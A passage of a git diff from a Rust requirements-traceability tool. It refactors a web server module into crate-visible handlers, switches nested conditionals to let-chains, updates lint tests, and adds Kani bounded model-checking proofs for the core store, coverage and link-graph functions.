    "); @@ -6908,7 +5058,7 @@ fn source_path_for_artifact(store: &Store, id: &str) -> String { } /// HTMX endpoint: return git history for a specific file as HTML fragment. -async fn traceability_history( +pub(crate) async fn traceability_history( State(state): State, Query(params): Query, ) -> Html { @@ -6968,197 +5118,7 @@ async fn traceability_history( // ── Helpers ────────────────────────────────────────────────────────────── -fn html_escape(s: &str) -> String { - s.replace('&', "&") - .replace('<', "<") - .replace('>', ">") - .replace('"', """) -} - -/// Rewrite relative image `src` paths to serve through `/docs-asset/`. -/// Leaves absolute URLs (http://, https://, //) unchanged. -fn rewrite_image_paths(html: &str) -> String { - let mut result = String::with_capacity(html.len()); - let mut rest = html; - while let Some(pos) = rest.find("src=\"") { - result.push_str(&rest[..pos]); - let after_src = &rest[pos + 5..]; // after src=" - if let Some(end) = after_src.find('"') { - let path = &after_src[..end]; - result.push_str("src=\""); - if path.starts_with("http://") - || path.starts_with("https://") - || path.starts_with("//") - || path.starts_with('/') - { - result.push_str(path); - } else { - result.push_str("/docs-asset/"); - result.push_str(path); - } - result.push('"'); - rest = &after_src[end + 1..]; - } else { - result.push_str("src=\""); - rest = after_src; - } - } - result.push_str(rest); - result -} - -/// Turn `path/to/file.rs:42` patterns into clickable `/source/path/to/file.rs#L42` links. -/// Also handles ranges like `file.rs:10-20` and plain `path/to/file.rs` (no line). -fn linkify_source_refs(s: &str) -> String { - // Regex-free: scan for patterns like word/word.ext:digits or word/word.ext:digits-digits - let mut result = String::new(); - let src = s; - let mut pos = 0usize; - - while pos < src.len() { - // Look for file-like patterns: contains '/' or '.' 
and optionally ':digits' - if let Some(m) = find_source_ref(&src[pos..]) { - result.push_str(&src[pos..pos + m.start]); - let file_path = &m.file; - let encoded_path = urlencoding::encode(file_path); - if let Some(line) = m.line { - if let Some(end_line) = m.end_line { - result.push_str(&format!( - "{file_path}:{line}-{end_line}" - )); - } else { - result.push_str(&format!( - "{file_path}:{line}" - )); - } - } else { - result.push_str(&format!( - "{file_path}" - )); - } - pos += m.start + m.len; - } else { - result.push_str(&src[pos..]); - break; - } - } - result -} - -struct SourceRefMatch { - start: usize, - len: usize, - file: String, - line: Option, - end_line: Option, -} - -/// Find the next source-ref pattern in text: `some/path.ext:line` or `some/path.ext:line-line` -/// File must contain a `/` or `.` with a recognized extension. -fn find_source_ref(s: &str) -> Option { - let extensions = [ - ".rs", ".yaml", ".yml", ".toml", ".md", ".py", ".js", ".ts", ".tsx", ".jsx", ".c", ".h", - ".cpp", ".hpp", ".go", ".java", ".rb", ".sh", ".json", ".xml", ".aadl", - ]; - let len = s.len(); - let mut i = 0; - while i < len { - // Try to match a file path starting at position i - // A file path: sequence of [a-zA-Z0-9_/.\-] containing at least one '/' and ending with a known extension - let start = i; - let mut j = i; - let mut has_slash = false; - let mut has_ext = false; - while j < len { - let c = s.as_bytes()[j]; - if c.is_ascii_alphanumeric() || c == b'_' || c == b'/' || c == b'.' 
|| c == b'-' { - if c == b'/' { - has_slash = true; - } - j += 1; - } else { - break; - } - } - if has_slash && j > start + 2 { - let candidate = &s[start..j]; - // Check if it ends with a known extension - for ext in &extensions { - if candidate.ends_with(ext) { - has_ext = true; - break; - } - } - if has_ext { - let file = candidate.to_string(); - // Check for :line or :line-line - if j < len && s.as_bytes()[j] == b':' { - let _colon_pos = j; - j += 1; - let line_start = j; - while j < len && s.as_bytes()[j].is_ascii_digit() { - j += 1; - } - if j > line_start { - let line: u32 = s[line_start..j].parse().unwrap_or(0); - if line > 0 { - // Check for range: -digits - if j < len && s.as_bytes()[j] == b'-' { - let dash = j; - j += 1; - let end_start = j; - while j < len && s.as_bytes()[j].is_ascii_digit() { - j += 1; - } - if j > end_start { - let end_line: u32 = s[end_start..j].parse().unwrap_or(0); - if end_line > 0 { - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: Some(line), - end_line: Some(end_line), - }); - } - } - // Not a valid range, just use line - return Some(SourceRefMatch { - start, - len: dash - start, - file, - line: Some(line), - end_line: None, - }); - } - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: Some(line), - end_line: None, - }); - } - } - } - // No line number, just file path - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: None, - end_line: None, - }); - } - } - i += 1; - } - None -} - -// ── Help / Docs / Schema dashboard views ─────────────────────────────── - -async fn help_view(State(state): State) -> Html { +pub(crate) async fn help_view(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7237,7 +5197,7 @@ async fn help_view(State(state): State) -> Html { Html(html) } -async fn help_docs_list(State(_state): State) -> Html { +pub(crate) async fn help_docs_list(State(_state): State) -> Html { let raw = 
docs::list_topics("text"); let mut html = String::with_capacity(4096); @@ -7288,7 +5248,7 @@ async fn help_docs_list(State(_state): State) -> Html { Html(html) } -async fn help_docs_topic( +pub(crate) async fn help_docs_topic( State(_state): State, Path(slug): Path, ) -> Html { @@ -7388,7 +5348,7 @@ async fn help_docs_topic( Html(html) } -async fn help_schema_list(State(state): State) -> Html { +pub(crate) async fn help_schema_list(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7427,7 +5387,7 @@ async fn help_schema_list(State(state): State) -> Html { Html(html) } -async fn help_schema_show( +pub(crate) async fn help_schema_show( State(state): State, Path(name): Path, ) -> Html { @@ -7445,7 +5405,7 @@ async fn help_schema_show( Html(html) } -async fn help_links_view(State(state): State) -> Html { +pub(crate) async fn help_links_view(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7476,7 +5436,7 @@ async fn help_links_view(State(state): State) -> Html { Html(html) } -async fn help_rules_view(State(state): State) -> Html { +pub(crate) async fn help_rules_view(State(state): State) -> Html { let state = state.read().await; let raw = schema_cmd::cmd_rules(&state.schema, "text"); diff --git a/rivet-cli/tests/serve_lint.rs b/rivet-cli/tests/serve_lint.rs index fb8ede7..f63d870 100644 --- a/rivet-cli/tests/serve_lint.rs +++ b/rivet-cli/tests/serve_lint.rs @@ -6,9 +6,24 @@ use std::path::PathBuf; -/// Return the path to `serve.rs` relative to the workspace. -fn serve_rs_path() -> PathBuf { - PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/serve.rs") +/// Return the path to the `serve/` module directory. +fn serve_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/serve") +} + +/// Read and concatenate all `.rs` source files in the serve module. 
+fn read_serve_sources() -> String { + let dir = serve_dir(); + let mut combined = String::new(); + for entry in std::fs::read_dir(&dir).expect("failed to read serve/ dir") { + let entry = entry.unwrap(); + let path = entry.path(); + if path.extension().is_some_and(|e| e == "rs") { + combined.push_str(&std::fs::read_to_string(&path).unwrap_or_default()); + combined.push('\n'); + } + } + combined } /// Every `hx-get` link that targets `#content` MUST also include @@ -21,7 +36,7 @@ fn serve_rs_path() -> PathBuf { /// - Lines that already contain `hx-push-url` #[test] fn all_content_links_push_url() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); let mut violations = Vec::new(); @@ -70,17 +85,17 @@ fn all_content_links_push_url() { /// the full page layout with content already rendered (no redirect needed). #[test] fn wrap_middleware_exists() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); assert!( source.contains("hx-request") || source.contains("HX-Request"), - "serve.rs must check the HX-Request header to distinguish \ + "serve module must check the HX-Request header to distinguish \ HTMX partial requests from direct browser navigations" ); assert!( source.contains("wrap_full_page"), - "serve.rs must contain the wrap_full_page middleware \ + "serve module must contain the wrap_full_page middleware \ for direct-access full-page rendering" ); @@ -95,7 +110,7 @@ fn wrap_middleware_exists() { /// so reloading stays on the current page instead of navigating to root. 
#[test] fn reload_uses_hx_location() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); // The reload handler should reference HX-Location for in-place reload assert!( diff --git a/rivet-core/Cargo.toml b/rivet-core/Cargo.toml index 5784178..3fbbf97 100644 --- a/rivet-core/Cargo.toml +++ b/rivet-core/Cargo.toml @@ -43,6 +43,9 @@ tokio = { workspace = true } tempfile = "3" serial_test = "3" +[lints] +workspace = true + [[bench]] name = "core_benchmarks" harness = false diff --git a/rivet-core/src/document.rs b/rivet-core/src/document.rs index 9ce11f6..e3ad5e7 100644 --- a/rivet-core/src/document.rs +++ b/rivet-core/src/document.rs @@ -654,61 +654,65 @@ fn resolve_inline( while let Some((i, ch)) = chars.next() { // Images: ![alt](url) - if ch == '!' && text[i..].starts_with("![") { - if let Some(link) = parse_markdown_link(&text[i + 1..]) { - let alt = html_escape(&link.text); - let src = html_escape(&link.url); - result.push_str(&format!( - "\"{alt}\"" - )); - let skip_to = i + 1 + link.total_len; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '!' + && text[i..].starts_with("![") + && let Some(link) = parse_markdown_link(&text[i + 1..]) + { + let alt = html_escape(&link.text); + let src = html_escape(&link.url); + result.push_str(&format!( + "\"{alt}\"" + )); + let skip_to = i + 1 + link.total_len; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Inline code (backticks) — must come before bold/italic since content is literal. 
- if ch == '`' { - if let Some(end) = text[i + 1..].find('`') { - let inner = html_escape(&text[i + 1..i + 1 + end]); - result.push_str(&format!("{inner}")); - let skip_to = i + 1 + end + 1; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '`' + && let Some(end) = text[i + 1..].find('`') + { + let inner = html_escape(&text[i + 1..i + 1 + end]); + result.push_str(&format!("{inner}")); + let skip_to = i + 1 + end + 1; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Markdown links [text](url) — must come before [[id]] artifact refs. - if ch == '[' && !text[i..].starts_with("[[") { - if let Some(link) = parse_markdown_link(&text[i..]) { - let text_part = html_escape(&link.text); - result.push_str(&format!( - "{text_part}", - href = html_escape(&link.url), - )); - let skip_to = i + link.total_len; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '[' + && !text[i..].starts_with("[[") + && let Some(link) = parse_markdown_link(&text[i..]) + { + let text_part = html_escape(&link.text); + result.push_str(&format!( + "{text_part}", + href = html_escape(&link.url), + )); + let skip_to = i + link.total_len; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Artifact embedding: {{artifact:ID}} - if ch == '{' && text[i..].starts_with("{{artifact:") { - if let Some(end) = text[i..].find("}}") { - let id = text[i + 11..i + end].trim(); - if let Some(info) = artifact_info(id) { - let desc_preview = if info.description.len() > 150 { - format!("{}…", &info.description[..150]) - } else { - info.description.clone() - }; - result.push_str(&format!( + if ch == '{' + && text[i..].starts_with("{{artifact:") + && let Some(end) = text[i..].find("}}") + { + let id = text[i + 11..i + end].trim(); + if let Some(info) = artifact_info(id) { + let desc_preview = if info.description.len() > 150 { + 
format!("{}…", &info.description[..150]) + } else { + info.description.clone() + }; + result.push_str(&format!( "
    \
    \ {id}\ @@ -724,23 +728,22 @@ fn resolve_inline( title = html_escape(&info.title), desc = html_escape(&desc_preview), )); - let skip_to = i + end + 2; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; - } else { - // Broken reference - result.push_str(&format!( - "{{{{artifact:{}}}}}", - html_escape(id) - )); - let skip_to = i + end + 2; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + let skip_to = i + end + 2; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); + } + continue; + } else { + // Broken reference + result.push_str(&format!( + "{{{{artifact:{}}}}}", + html_escape(id) + )); + let skip_to = i + end + 2; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } } diff --git a/rivet-core/src/externals.rs b/rivet-core/src/externals.rs index cc1a7a0..6315465 100644 --- a/rivet-core/src/externals.rs +++ b/rivet-core/src/externals.rs @@ -24,13 +24,15 @@ pub enum ArtifactRef { pub fn parse_artifact_ref(s: &str) -> ArtifactRef { // Only split on first colon. The prefix must be purely alphabetic // (no digits, hyphens, or dots) to avoid confusion with IDs like "H-1.2". 
- if let Some((prefix, id)) = s.split_once(':') { - if !prefix.is_empty() && prefix.chars().all(|c| c.is_ascii_lowercase()) && !id.is_empty() { - return ArtifactRef::External { - prefix: prefix.to_string(), - id: id.to_string(), - }; - } + if let Some((prefix, id)) = s.split_once(':') + && !prefix.is_empty() + && prefix.chars().all(|c| c.is_ascii_lowercase()) + && !id.is_empty() + { + return ArtifactRef::External { + prefix: prefix.to_string(), + id: id.to_string(), + }; } ArtifactRef::Local(s.to_string()) } @@ -418,18 +420,19 @@ pub fn detect_version_conflicts( for ext in externals.values() { let ext_dir = resolve_external_dir(ext, &cache_dir, project_dir); let config_path = ext_dir.join("rivet.yaml"); - if let Ok(ext_config) = crate::load_project_config(&config_path) { - if let Some(ref ext_externals) = ext_config.externals { - for (ext_name, ext_ext) in ext_externals { - let repo_id = ext_ext.git.clone().unwrap_or_else(|| { - ext_ext.path.clone().unwrap_or_else(|| ext_name.clone()) - }); - let version = ext_ext.git_ref.clone().unwrap_or_else(|| "HEAD".into()); - by_url.entry(repo_id).or_default().push(ConflictEntry { - declared_by: ext.prefix.clone(), - version, - }); - } + if let Ok(ext_config) = crate::load_project_config(&config_path) + && let Some(ref ext_externals) = ext_config.externals + { + for (ext_name, ext_ext) in ext_externals { + let repo_id = ext_ext + .git + .clone() + .unwrap_or_else(|| ext_ext.path.clone().unwrap_or_else(|| ext_name.clone())); + let version = ext_ext.git_ref.clone().unwrap_or_else(|| "HEAD".into()); + by_url.entry(repo_id).or_default().push(ConflictEntry { + declared_by: ext.prefix.clone(), + version, + }); } } } @@ -646,11 +649,11 @@ pub fn detect_circular_deps( for ext in externals.values() { let ext_dir = resolve_external_dir(ext, &cache_dir, project_dir); let config_path = ext_dir.join("rivet.yaml"); - if let Ok(ext_config) = crate::load_project_config(&config_path) { - if let Some(ref ext_externals) = ext_config.externals { 
- let ext_deps: Vec = ext_externals.keys().cloned().collect(); - graph.insert(ext.prefix.clone(), ext_deps); - } + if let Ok(ext_config) = crate::load_project_config(&config_path) + && let Some(ref ext_externals) = ext_config.externals + { + let ext_deps: Vec = ext_externals.keys().cloned().collect(); + graph.insert(ext.prefix.clone(), ext_deps); } } diff --git a/rivet-core/src/formats/aadl.rs b/rivet-core/src/formats/aadl.rs index 687ae93..1f3ed6b 100644 --- a/rivet-core/src/formats/aadl.rs +++ b/rivet-core/src/formats/aadl.rs @@ -129,13 +129,13 @@ fn import_aadl_sources( // Run instance-level analyses if a root classifier is configured. let root_classifier = config.get("root-classifier"); - if let Some(root_name) = root_classifier { - if let Some(instance) = db.instantiate(root_name) { - let instance_diags = run_instance_analyses(&instance); - for diag in &instance_diags { - artifacts.push(analysis_diagnostic_to_artifact(diag_index, diag)); - diag_index += 1; - } + if let Some(root_name) = root_classifier + && let Some(instance) = db.instantiate(root_name) + { + let instance_diags = run_instance_analyses(&instance); + for diag in &instance_diags { + artifacts.push(analysis_diagnostic_to_artifact(diag_index, diag)); + diag_index += 1; } } diff --git a/rivet-core/src/lib.rs b/rivet-core/src/lib.rs index 168c442..abb4b4f 100644 --- a/rivet-core/src/lib.rs +++ b/rivet-core/src/lib.rs @@ -20,6 +20,9 @@ pub mod schema; pub mod store; pub mod validate; +#[cfg(kani)] +mod proofs; + #[cfg(feature = "wasm")] pub mod wasm_runtime; diff --git a/rivet-core/src/proofs.rs b/rivet-core/src/proofs.rs new file mode 100644 index 0000000..8bac2e6 --- /dev/null +++ b/rivet-core/src/proofs.rs @@ -0,0 +1,514 @@ +//! Kani bounded model checking proof harnesses. +//! +//! These harnesses verify panic-freedom and key invariants of rivet-core +//! functions using Kani's symbolic execution engine. They are compiled +//! only when `cfg(kani)` is active (i.e. when running `cargo kani`). +//! 
+//! **Running:** Install Kani, then `cargo kani -p rivet-core`. + +#[cfg(kani)] +mod proofs { + use std::collections::BTreeMap; + + use crate::coverage::{CoverageEntry, compute_coverage}; + use crate::externals::{ArtifactRef, parse_artifact_ref}; + use crate::links::LinkGraph; + use crate::model::{Artifact, Link}; + use crate::schema::{ + ArtifactTypeDef, Cardinality, LinkFieldDef, LinkTypeDef, Schema, SchemaFile, + SchemaMetadata, Severity, TraceabilityRule, + }; + use crate::store::Store; + use crate::validate; + + // ── Helpers ────────────────────────────────────────────────────────── + + /// Build a minimal artifact with the given id, type, and links. + fn make_artifact(id: &str, artifact_type: &str, links: Vec) -> Artifact { + Artifact { + id: id.into(), + artifact_type: artifact_type.into(), + title: id.into(), + description: None, + status: None, + tags: vec![], + links, + fields: BTreeMap::new(), + source_file: None, + } + } + + /// Build a minimal empty schema (no types, no rules). + fn empty_schema() -> Schema { + Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-test".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![], + link_types: vec![], + traceability_rules: vec![], + }]) + } + + /// Build a schema with a single artifact type and a single traceability rule. 
+ fn schema_with_rule() -> Schema { + Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-rule".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "requirement".into(), + description: "A requirement".into(), + fields: vec![], + link_fields: vec![], + aspice_process: None, + }], + link_types: vec![LinkTypeDef { + name: "satisfies".into(), + inverse: Some("satisfied-by".into()), + description: "satisfies link".into(), + source_types: vec![], + target_types: vec![], + }], + traceability_rules: vec![TraceabilityRule { + name: "req-traced".into(), + description: "Requirements must be satisfied".into(), + source_type: "requirement".into(), + required_link: None, + required_backlink: Some("satisfies".into()), + target_types: vec![], + from_types: vec![], + severity: Severity::Warning, + }], + }]) + } + + // ── 1. parse_artifact_ref: panic-freedom ──────────────────────────── + + /// Proves that `parse_artifact_ref` never panics for any string input + /// up to 64 bytes. This covers all possible combinations of colons, + /// ASCII letters, digits, punctuation, and empty strings. + #[kani::proof] + #[kani::unwind(66)] + fn proof_parse_artifact_ref_no_panic() { + // Use a bounded byte array and convert to a valid UTF-8 string. + // Kani will explore all possible byte sequences up to this length. + let len: usize = kani::any(); + kani::assume(len <= 8); // keep tractable for bounded model checking + let mut bytes = [0u8; 8]; + for i in 0..8 { + if i < len { + bytes[i] = kani::any(); + // Restrict to printable ASCII to keep within valid UTF-8 + // and to exercise the colon-splitting logic meaningfully. 
+ kani::assume(bytes[i] >= 0x20 && bytes[i] <= 0x7E); + } + } + let s = std::str::from_utf8(&bytes[..len]); + if let Ok(input) = s { + let result = parse_artifact_ref(input); + // Verify the result is well-formed: the original string is + // recoverable from the parsed reference. + match &result { + ArtifactRef::Local(id) => { + kani::assert(id == input, "Local ref must preserve input"); + } + ArtifactRef::External { prefix, id } => { + // prefix:id must reconstruct the original + kani::assert(!prefix.is_empty(), "External prefix must be non-empty"); + kani::assert(!id.is_empty(), "External id must be non-empty"); + kani::assert( + prefix.chars().all(|c| c.is_ascii_lowercase()), + "External prefix must be all lowercase ASCII", + ); + } + } + } + } + + // ── 2. Store::insert: panic-freedom ───────────────────────────────── + + /// Proves that `Store::insert` never panics for any artifact with + /// bounded-length fields. The function may return Ok or Err, but + /// must not panic. + #[kani::proof] + fn proof_store_insert_no_panic() { + let mut store = Store::new(); + + // Build an artifact with symbolic id and type + let id_len: usize = kani::any(); + kani::assume(id_len >= 1 && id_len <= 4); + let type_len: usize = kani::any(); + kani::assume(type_len >= 1 && type_len <= 4); + + let mut id_bytes = [b'A'; 4]; + for i in 0..4 { + if i < id_len { + id_bytes[i] = kani::any(); + kani::assume(id_bytes[i].is_ascii_alphanumeric() || id_bytes[i] == b'-'); + } + } + let mut type_bytes = [b'a'; 4]; + for i in 0..4 { + if i < type_len { + type_bytes[i] = kani::any(); + kani::assume(type_bytes[i].is_ascii_lowercase()); + } + } + + let id = String::from_utf8(id_bytes[..id_len].to_vec()).unwrap(); + let atype = String::from_utf8(type_bytes[..type_len].to_vec()).unwrap(); + + let artifact = make_artifact(&id, &atype, vec![]); + let _ = store.insert(artifact); + // Reaching here proves no panic occurred. + } + + // ── 3. 
Store::insert duplicate returns Err ────────────────────────── + + /// Proves that inserting an artifact with the same ID twice always + /// returns `Err` on the second call, while the first always succeeds + /// on an empty store. + #[kani::proof] + fn proof_store_duplicate_returns_error() { + let mut store = Store::new(); + + let a1 = make_artifact("KANI-DUP", "requirement", vec![]); + let a2 = make_artifact("KANI-DUP", "requirement", vec![]); + + let first = store.insert(a1); + kani::assert(first.is_ok(), "First insert into empty store must succeed"); + + let second = store.insert(a2); + kani::assert( + second.is_err(), + "Second insert with same ID must return Err", + ); + + // Store length must still be 1 + kani::assert(store.len() == 1, "Store must contain exactly one artifact"); + } + + // ── 4. CoverageEntry::percentage bounds ───────────────────────────── + + /// Proves that `CoverageEntry::percentage()` always returns a value + /// in [0.0, 100.0] for any valid (covered, total) pair where + /// covered <= total. 
+ #[kani::proof] + fn proof_coverage_percentage_bounds() { + let covered: usize = kani::any(); + let total: usize = kani::any(); + + // Bound to avoid solver explosion on large numbers + kani::assume(total <= 1024); + kani::assume(covered <= total); + + let entry = CoverageEntry { + rule_name: String::new(), + description: String::new(), + source_type: String::new(), + link_type: String::new(), + direction: crate::coverage::CoverageDirection::Forward, + target_types: vec![], + covered, + total, + uncovered_ids: vec![], + }; + + let pct = entry.percentage(); + kani::assert(pct >= 0.0, "Coverage percentage must be >= 0.0"); + kani::assert(pct <= 100.0, "Coverage percentage must be <= 100.0"); + + // Additional: when total is 0, percentage must be 100.0 + if total == 0 { + kani::assert(pct == 100.0, "Coverage with zero total must be 100.0"); + } + + // Additional: when covered == total and total > 0, percentage must be 100.0 + if covered == total && total > 0 { + kani::assert(pct == 100.0, "Full coverage must yield 100.0"); + } + + // Additional: when covered == 0 and total > 0, percentage must be 0.0 + if covered == 0 && total > 0 { + kani::assert(pct == 0.0, "Zero coverage must yield 0.0"); + } + } + + // ── 5. Cardinality exhaustive match ───────────────────────────────── + + /// Proves that the cardinality matching logic in validation handles + /// all enum variants without hitting an unreachable state. We + /// construct a schema with every cardinality variant and verify that + /// validate() processes them all without panicking. 
+ #[kani::proof] + fn proof_cardinality_exhaustive() { + let cardinalities = [ + Cardinality::ExactlyOne, + Cardinality::ZeroOrMany, + Cardinality::ZeroOrOne, + Cardinality::OneOrMany, + ]; + + // Pick a symbolic cardinality index + let idx: usize = kani::any(); + kani::assume(idx < cardinalities.len()); + let cardinality = cardinalities[idx].clone(); + + // Build a schema with a single artifact type having one link field + // with the chosen cardinality + let schema = Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-card".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "test-type".into(), + description: "test".into(), + fields: vec![], + link_fields: vec![LinkFieldDef { + name: "test-link".into(), + link_type: "depends-on".into(), + target_types: vec![], + required: true, + cardinality, + }], + aspice_process: None, + }], + link_types: vec![], + traceability_rules: vec![], + }]); + + // Build a store with an artifact of that type, with a symbolic + // number of links (0, 1, or 2) + let link_count: usize = kani::any(); + kani::assume(link_count <= 2); + + let mut links = Vec::new(); + for i in 0..link_count { + let target_id = if i == 0 { + "TARGET-A".to_string() + } else { + "TARGET-B".to_string() + }; + links.push(Link { + link_type: "depends-on".into(), + target: target_id, + }); + } + + let mut store = Store::new(); + store + .insert(make_artifact("CARD-TEST", "test-type", links)) + .unwrap(); + // Add targets so links aren't broken + store + .insert(make_artifact("TARGET-A", "test-type", vec![])) + .unwrap(); + store + .insert(make_artifact("TARGET-B", "test-type", vec![])) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + let diagnostics = validate::validate(&store, &schema, &graph); + + // We don't assert specific diagnostics — the proof succeeds if + // validate() completes without panicking for 
every combination + // of cardinality variant and link count. + let _ = diagnostics; + } + + // ── 6. compute_coverage end-to-end: bounds check ──────────────────── + + /// Proves that `compute_coverage` produces a report where every + /// entry has covered <= total and percentage in [0.0, 100.0], and + /// the overall coverage is also bounded. + #[kani::proof] + fn proof_compute_coverage_report_bounds() { + let schema = schema_with_rule(); + let mut store = Store::new(); + + // Symbolically decide how many requirements to insert (0..3) + let n: usize = kani::any(); + kani::assume(n <= 3); + + for i in 0..n { + let id = match i { + 0 => "REQ-K0", + 1 => "REQ-K1", + 2 => "REQ-K2", + _ => unreachable!(), + }; + store + .insert(make_artifact(id, "requirement", vec![])) + .unwrap(); + } + + let graph = LinkGraph::build(&store, &schema); + let report = compute_coverage(&store, &schema, &graph); + + for entry in &report.entries { + kani::assert(entry.covered <= entry.total, "covered must be <= total"); + let pct = entry.percentage(); + kani::assert(pct >= 0.0, "entry percentage must be >= 0"); + kani::assert(pct <= 100.0, "entry percentage must be <= 100"); + } + + let overall = report.overall_coverage(); + kani::assert(overall >= 0.0, "overall coverage must be >= 0"); + kani::assert(overall <= 100.0, "overall coverage must be <= 100"); + } + + // ── 7. Schema::merge: idempotence ─────────────────────────────────── + + /// Proves that merging a schema with itself produces the same number + /// of artifact types and link types (idempotence). 
+ #[kani::proof] + fn proof_schema_merge_idempotent() { + let file = SchemaFile { + schema: SchemaMetadata { + name: "kani-idem".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "req".into(), + description: "requirement".into(), + fields: vec![], + link_fields: vec![], + aspice_process: None, + }], + link_types: vec![LinkTypeDef { + name: "satisfies".into(), + inverse: Some("satisfied-by".into()), + description: "satisfies link".into(), + source_types: vec![], + target_types: vec![], + }], + traceability_rules: vec![], + }; + + let single = Schema::merge(&[file.clone()]); + let doubled = Schema::merge(&[file.clone(), file]); + + kani::assert( + single.artifact_types.len() == doubled.artifact_types.len(), + "Merging schema with itself must preserve artifact type count", + ); + kani::assert( + single.link_types.len() == doubled.link_types.len(), + "Merging schema with itself must preserve link type count", + ); + kani::assert( + single.inverse_map.len() == doubled.inverse_map.len(), + "Merging schema with itself must preserve inverse map size", + ); + } + + // ── 8. LinkGraph: orphan detection correctness ────────────────────── + + /// Proves that an artifact with no links (inserted alone) is always + /// detected as an orphan. + #[kani::proof] + fn proof_linkgraph_lone_artifact_is_orphan() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact("ORPHAN-1", "test", vec![])) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + let orphans = graph.orphans(&store); + + kani::assert( + orphans.len() == 1, + "Single unlinked artifact must be an orphan", + ); + kani::assert( + orphans[0] == "ORPHAN-1", + "Orphan ID must match inserted artifact", + ); + } + + // ── 9. LinkGraph: has_cycles is false for DAG ─────────────────────── + + /// Proves that a simple chain A -> B -> C (a DAG) has no cycles. 
+ #[kani::proof] + fn proof_linkgraph_dag_no_cycles() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact( + "A", + "test", + vec![Link { + link_type: "dep".into(), + target: "B".into(), + }], + )) + .unwrap(); + store + .insert(make_artifact( + "B", + "test", + vec![Link { + link_type: "dep".into(), + target: "C".into(), + }], + )) + .unwrap(); + store.insert(make_artifact("C", "test", vec![])).unwrap(); + + let graph = LinkGraph::build(&store, &schema); + kani::assert(!graph.has_cycles(), "A->B->C DAG must not have cycles"); + } + + // ── 10. LinkGraph: cycle detection ────────────────────────────────── + + /// Proves that a cycle A -> B -> A is correctly detected. + #[kani::proof] + fn proof_linkgraph_cycle_detected() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact( + "CYC-A", + "test", + vec![Link { + link_type: "dep".into(), + target: "CYC-B".into(), + }], + )) + .unwrap(); + store + .insert(make_artifact( + "CYC-B", + "test", + vec![Link { + link_type: "dep".into(), + target: "CYC-A".into(), + }], + )) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + kani::assert(graph.has_cycles(), "A->B->A must be detected as a cycle"); + } +} diff --git a/rivet-core/src/query.rs b/rivet-core/src/query.rs index 80e9c9a..69eb2f6 100644 --- a/rivet-core/src/query.rs +++ b/rivet-core/src/query.rs @@ -15,30 +15,30 @@ pub struct Query { impl Query { pub fn matches(&self, artifact: &Artifact) -> bool { - if let Some(t) = &self.artifact_type { - if artifact.artifact_type != *t { - return false; - } + if let Some(t) = &self.artifact_type + && artifact.artifact_type != *t + { + return false; } - if let Some(s) = &self.status { - if artifact.status.as_deref() != Some(s.as_str()) { - return false; - } + if let Some(s) = &self.status + && artifact.status.as_deref() != Some(s.as_str()) + { + return false; } - if let Some(tag) = &self.tag { - if !artifact.tags.contains(tag) { - 
return false; - } + if let Some(tag) = &self.tag + && !artifact.tags.contains(tag) + { + return false; } - if let Some(lt) = &self.has_link_type { - if !artifact.has_link_type(lt) { - return false; - } + if let Some(lt) = &self.has_link_type + && !artifact.has_link_type(lt) + { + return false; } - if let Some(lt) = &self.missing_link_type { - if artifact.has_link_type(lt) { - return false; - } + if let Some(lt) = &self.missing_link_type + && artifact.has_link_type(lt) + { + return false; } true } diff --git a/rivet-core/src/store.rs b/rivet-core/src/store.rs index 4f2f03c..52495dd 100644 --- a/rivet-core/src/store.rs +++ b/rivet-core/src/store.rs @@ -40,12 +40,11 @@ impl Store { let artifact_type = artifact.artifact_type.clone(); // Remove from old type index if updating - if let Some(old) = self.artifacts.get(&id) { - if old.artifact_type != artifact_type { - if let Some(ids) = self.by_type.get_mut(&old.artifact_type) { - ids.retain(|i| i != &id); - } - } + if let Some(old) = self.artifacts.get(&id) + && old.artifact_type != artifact_type + && let Some(ids) = self.by_type.get_mut(&old.artifact_type) + { + ids.retain(|i| i != &id); } 